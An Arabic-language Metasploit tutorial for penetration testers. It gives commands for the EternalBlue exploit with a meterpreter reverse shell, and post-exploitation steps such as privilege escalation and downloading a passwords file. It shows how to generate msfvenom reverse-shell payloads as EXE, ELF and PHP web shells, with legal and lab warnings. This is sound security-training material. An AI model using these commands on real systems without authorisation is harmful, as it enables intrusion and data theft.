⚠️ تحذير قانوني:
استخدم Metasploit فقط على أنظمة تملكها أو لديك إذن خطي باختبارها. الاستخدام غير المصرح به جريمة جنائية في معظم الدول.
استخدم Metasploit فقط على أنظمة تملكها أو لديك إذن خطي باختبارها. الاستخدام غير المصرح به جريمة جنائية في معظم الدول.
ما هو Metasploit Framework؟
Metasploit Framework هو أشهر إطار عمل لاختبار الاختراق. يحتوي على آلاف الـ Exploits والـ Payloads الجاهزة للاستخدام. تم تطويره بلغة Ruby ويعمل على جميع أنظمة التشغيل الرئيسية.
تشغيل Metasploit
root@kali:~$
# تشغيل قاعدة البيانات أولاً sudo service postgresql start [ ok ] Starting postgresql (via systemctl)... # تشغيل Metasploit msfconsole =[ metasploit v6.4.0 ]= + -- --=[ 2400+ exploits | 1200+ auxiliary | 420+ post ] + -- --=[ 980+ payloads | 60+ encoders | 10+ nops ] msf6 >
أوامر Metasploit الأساسية
msf6 >
# البحث عن Exploit msf6 > search type:exploit platform:windows ms17-010 # اختيار الـ Exploit msf6 > use exploit/windows/smb/ms17_010_eternalblue # عرض الخيارات المطلوبة msf6 exploit(ms17_010_eternalblue) > show options # تعيين الهدف msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.50 # اختيار الـ Payload msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # تعيين عنوان IP الخاص بنا msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100 # تشغيل الـ Exploit msf6 exploit(ms17_010_eternalblue) > run
Meterpreter - الـ Shell المتقدم
بعد الاختراق الناجح، تحصل على Meterpreter Shell - وهو Shell متقدم يوفر إمكانيات قوية:
meterpreter >
# معلومات النظام meterpreter > sysinfo Computer : DESKTOP-TARGET OS : Windows 10 (Build 19044) Architecture : x64 # رفع صلاحيات meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation) # تصوير الشاشة meterpreter > screenshot # تنزيل ملف meterpreter > download C:/Users/Admin/passwords.txt # تشغيل Shell عادي meterpreter > shell
msfvenom - إنشاء Payloads
root@kali:~$
# Payload لـ Windows EXE msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.1.100 LPORT=4444 \ -f exe -o payload.exe # Payload لـ Linux ELF msfvenom -p linux/x64/meterpreter/reverse_tcp \ LHOST=192.168.1.100 LPORT=4444 \ -f elf -o payload.elf # Web Shell PHP msfvenom -p php/meterpreter/reverse_tcp \ LHOST=192.168.1.100 LPORT=4444 \ -f raw -o shell.php
أوامر msfconsole المهمة
search— البحث عن Exploits والـ Modulesinfo— معلومات تفصيلية عن الـ Moduleshow payloads— عرض الـ Payloads المتوافقةset / setg— تعيين المتغيرات (setg عالمي)sessions -l— عرض جميع الجلسات المفتوحةsessions -i 1— الدخول لجلسة معينةbackground— إخفاء الجلسة للخلفيةdb_nmap -sV target— نسخ Nmap مع حفظ النتائج
💡 نصيحة للمختبرين:
دائماً اختبر في بيئة معزولة (Lab) قبل التطبيق. استخدم Metasploitable 2/3 كهدف تدريبي آمن.
دائماً اختبر في بيئة معزولة (Lab) قبل التطبيق. استخدم Metasploitable 2/3 كهدف تدريبي آمن.